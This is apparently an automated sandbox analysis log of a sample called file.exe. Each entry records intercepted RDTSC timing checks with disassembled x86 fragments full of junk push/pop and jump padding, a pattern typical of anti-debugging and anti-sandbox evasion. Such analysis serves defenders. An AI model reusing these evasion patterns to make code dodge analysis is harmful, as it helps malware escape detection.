    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78195E second address: 78197A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jng 00007FF7A0B3802Ah 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78197A second address: 7819BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A105DEB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov eax, dword ptr [eax] 0x0000000c push edi 0x0000000d pushad 0x0000000e jmp 00007FF7A105DEB5h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7819BB second address: 7819BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 787430 second address: 787437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 787437 second address: 78744C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 jns 00007FF7A0B38026h 0x0000000d jnp 00007FF7A0B38026h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78744C second address: 787461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007FF7A105DEADh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 787461 second address: 787469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7860C7 second address: 7860CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7866B5 second address: 7866D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7A0B38037h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78684C second address: 786871 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF7A105DEA8h 0x00000008 ja 00007FF7A105DEBFh 0x0000000e jmp 00007FF7A105DEB3h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786CEF second address: 786D24 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FF7A0B38032h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007FF7A0B3802Ah 0x00000014 jmp 00007FF7A0B38030h 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786E70 second address: 786E79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786E79 second address: 786E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786E7F second address: 786E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786E84 second address: 786E91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jnl 00007FF7A0B38026h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789EAC second address: 789EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FF7A105DEA6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789EBB second address: 789EBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789EBF second address: 789EC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789EC3 second address: 789EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7932DB second address: 7932F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF7A105DEACh 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jo 00007FF7A105DEA6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 791DA5 second address: 791DAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 791DAF second address: 791DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79217F second address: 79218C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jc 00007FF7A0B3802Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7927FA second address: 792803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 792803 second address: 792820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF7A0B38034h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 792820 second address: 79282A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF7A105DEA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 792AFC second address: 792B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7A0B38036h 0x00000009 pushad 0x0000000a jmp 00007FF7A0B3802Dh 0x0000000f jnl 00007FF7A0B38026h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 792C71 second address: 792C7E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF7A105DEA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 792C7E second address: 792C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 push edi 0x00000007 je 00007FF7A0B3802Eh 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 792C8F second address: 792C98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 793144 second address: 793148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7979AE second address: 7979B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7979B4 second address: 7979B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 724CF5 second address: 724D11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF7A105DEABh 0x00000008 jng 00007FF7A105DEA6h 0x0000000e je 00007FF7A105DEA6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761EAD second address: 761EB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761EB2 second address: 761EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761EB8 second address: 761EFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jng 00007FF7A0B38029h 0x00000010 movzx edi, si 0x00000013 lea eax, dword ptr [ebp+12481C17h] 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007FF7A0B38028h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 cld 0x00000034 push eax 0x00000035 jc 00007FF7A0B38044h 0x0000003b push eax 0x0000003c push edx 0x0000003d je 00007FF7A0B38026h 0x00000043 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761EFF second address: 743A69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A105DEB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FF7A105DEA8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 mov dword ptr [ebp+1244D096h], esi 0x0000002c mov dword ptr [ebp+1244A4BFh], edx 0x00000032 call dword ptr [ebp+12449644h] 0x00000038 pushad 0x00000039 jp 00007FF7A105DEA8h 0x0000003f jp 00007FF7A105DEB5h 0x00000045 jmp 00007FF7A105DEB9h 0x0000004a popad 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007FF7A105DEB3h 0x00000052 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762018 second address: 7620B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a popad 0x0000000b xchg eax, ebx 0x0000000c sub edi, 5361EE11h 0x00000012 mov cx, bx 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov cl, 65h 0x00000025 call 00007FF7A0B38039h 0x0000002a or edi, dword ptr [ebp+122D3B9Bh] 0x00000030 pop ecx 0x00000031 mov dword ptr [ebp+12481C6Fh], esp 0x00000037 push ecx 0x00000038 xor dword ptr [ebp+1246D091h], ecx 0x0000003e pop edx 0x0000003f cmp dword ptr [ebp+122D3BC7h], 00000000h 0x00000046 jne 00007FF7A0B38133h 0x0000004c jno 00007FF7A0B3802Ch 0x00000052 mov byte ptr [ebp+122D286Ch], 00000047h 0x00000059 mov edx, dword ptr [ebp+122D287Ah] 0x0000005f mov eax, D49AA7D2h 0x00000064 mov dword ptr [ebp+122D1D1Dh], esi 0x0000006a nop 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007FF7A0B38038h 0x00000074 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7620B9 second address: 7620C3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF7A105DEA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762450 second address: 762455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762455 second address: 76245A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76245A second address: 762474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FF7A0B38030h 0x00000010 jmp 00007FF7A0B3802Ah 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762474 second address: 76247F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FF7A105DEA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76247F second address: 5B3EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 jmp 00007FF7A0B38035h 0x0000000d push dword ptr [ebp+122D0D21h] 0x00000013 mov edx, 2C82F50Fh 0x00000018 call dword ptr [ebp+122D24CFh] 0x0000001e pushad 0x0000001f jmp 00007FF7A0B38034h 0x00000024 xor eax, eax 0x00000026 pushad 0x00000027 adc esi, 6AE61E96h 0x0000002d mov edi, dword ptr [ebp+122D3C8Fh] 0x00000033 popad 0x00000034 mov edx, dword ptr [esp+28h] 0x00000038 pushad 0x00000039 mov ecx, dword ptr [ebp+122D3C7Fh] 0x0000003f jmp 00007FF7A0B3802Eh 0x00000044 popad 0x00000045 pushad 0x00000046 movsx ecx, dx 0x00000049 popad 0x0000004a mov dword ptr [ebp+122D3B33h], eax 0x00000050 mov dword ptr [ebp+122D1D1Dh], edx 0x00000056 mov esi, 0000003Ch 0x0000005b stc 0x0000005c add esi, dword ptr [esp+24h] 0x00000060 jng 00007FF7A0B3802Ch 0x00000066 sub dword ptr [ebp+122D1D1Dh], eax 0x0000006c lodsw 0x0000006e pushad 0x0000006f mov dh, 17h 0x00000071 mov esi, dword ptr [ebp+122D3D3Fh] 0x00000077 popad 0x00000078 add eax, dword ptr [esp+24h] 0x0000007c jmp 00007FF7A0B38031h 0x00000081 mov ebx, dword ptr [esp+24h] 0x00000085 jmp 00007FF7A0B38036h 0x0000008a push eax 0x0000008b push eax 0x0000008c push edx 0x0000008d jnp 00007FF7A0B3803Ah 0x00000093 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7624E8 second address: 762502 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A105DEB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762502 second address: 76252D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A0B38031h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 7641F7BBh 0x00000010 push C26B1E07h 0x00000015 push eax 0x00000016 push edx 0x00000017 jnc 00007FF7A0B3802Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76252D second address: 762531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762531 second address: 762537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762537 second address: 76253B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76266A second address: 7626A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], esi 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FF7A0B38028h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jnp 00007FF7A0B3802Ch 0x0000002c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76287A second address: 7628AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A105DEB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jns 00007FF7A105DEA8h 0x00000012 push eax 0x00000013 push edx 0x00000014 jbe 00007FF7A105DEA6h 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762DBC second address: 762DC2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762DC2 second address: 762DDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FF7A105DEA6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007FF7A105DEA6h 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762DDA second address: 762DDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763068 second address: 76306D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76306D second address: 763073 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763104 second address: 763124 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A105DEB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FF7A105DEA6h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 763124 second address: 76312A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76312A second address: 76312F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79717F second address: 797196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 ja 00007FF7A0B3802Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FF7A0B38026h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797352 second address: 797386 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF7A105DEA6h 0x00000008 jmp 00007FF7A105DEAAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007FF7A105DEA6h 0x00000017 jmp 00007FF7A105DEB8h 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797386 second address: 79738A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79738A second address: 797390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7974DA second address: 797513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FF7A0B38043h 0x0000000c pop esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007FF7A0B38026h 0x00000016 jnc 00007FF7A0B38026h 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797513 second address: 797541 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FF7A105DEB2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FF7A105DEB0h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797541 second address: 797545 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D7D1 second address: 79D7D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D7D6 second address: 79D7DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79CA36 second address: 79CA69 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF7A105DEB4h 0x0000000b jne 00007FF7A105DEB4h 0x00000011 jmp 00007FF7A105DEACh 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 pushad 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79CE8A second address: 79CE91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79CFE1 second address: 79D041 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A105DEB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF7A105DEB8h 0x0000000e push edx 0x0000000f jmp 00007FF7A105DEADh 0x00000014 jno 00007FF7A105DEA6h 0x0000001a pop edx 0x0000001b push eax 0x0000001c jc 00007FF7A105DEA6h 0x00000022 pop eax 0x00000023 popad 0x00000024 push ecx 0x00000025 push edx 0x00000026 jmp 00007FF7A105DEABh 0x0000002b push ecx 0x0000002c pop ecx 0x0000002d pop edx 0x0000002e push esi 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D1B2 second address: 79D1B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D1B6 second address: 79D1D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A105DEAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FF7A105DEA6h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D1D3 second address: 79D1DD instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF7A0B38026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D1DD second address: 79D1EB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF7A105DEA8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D4D1 second address: 79D4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D4D5 second address: 79D4D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D4D9 second address: 79D4E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D4E1 second address: 79D4EF instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF7A105DEA8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D4EF second address: 79D4F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D4F5 second address: 79D4F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A04D9 second address: 7A04DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A28DF second address: 7A28E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A28E5 second address: 7A2906 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF7A0B3802Ch 0x0000000c jp 00007FF7A0B38026h 0x00000012 jo 00007FF7A0B38026h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
